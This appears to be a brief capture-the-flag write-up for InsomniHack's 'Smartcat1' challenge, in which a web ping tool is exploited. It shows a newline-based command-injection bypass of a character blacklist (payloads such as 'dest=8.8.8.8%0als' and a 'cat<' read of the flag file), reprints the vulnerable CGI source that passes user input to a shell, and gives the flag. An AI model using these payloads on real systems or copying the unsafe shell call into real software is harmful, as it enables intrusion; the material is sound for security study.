Arr0way
Challenge Description
Exploit the web based ping command tool and capture the flag.
InsomniHack Smartcat1
Entering nothing or a ' renders the error: Error running ping -c 1 foo. Enumeration indicated the following characters were filtered $;&|({`\t Note, that included whitespace filtering.
I loaded up burp and went through the ASCII table for other ways of escaping the command. It was possible to use LF %0a to escape the existing command and enter another such as: dest=8.8.8.8%0als.
Viewing the source code of index.cgi confirmed the character filtering.
#!/usr/bin/env python
import cgi, subprocess, os
headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"]
print "X-Powered-By: %s" % headers[os.getpid()%4]
print "Content-type: text/html"
print
print """
<html>
<head><title>Can I haz Smart Cat ???</title></head>
<body>
<h3> Smart Cat debugging interface </h3>
"""
blacklist = " $;&|({`\t"
results = ""
form = cgi.FieldStorage()
dest = form.getvalue("dest", "127.0.0.1")
for badchar in blacklist:
if badchar in dest:
results = "Bad character %s in dest" % badchar
break
if "%n" in dest:
results = "Segmentation fault"
if not results:
try:
results = subprocess.check_output("ping -c 1 "+dest, shell=True)
except:
results = "Error running " + "ping -c 1 "+dest
print """
<form method="post" action="index.cgi">
<p>Ping destination: <input type="text" name="dest"/></p>
</form>
<p>Ping results:</p><br/>
<pre>%s</pre>
<img src="../img/cat.jpg"/>
</body>
</html>
""" % cgi.escape(results)Flag
Entering dest=%0afind listed the current directory, revealing the path of the flag.
dest=8.8.8.8%0acat<./there/is/your/flag/or/maybe/not/what/do/you/think/really/please/tell/me/seriously/though/here/is/the/flagFlag contents:
INS{warm_kitty_smelly_kitty_flush_flush_flush}Thanks for the CTF :)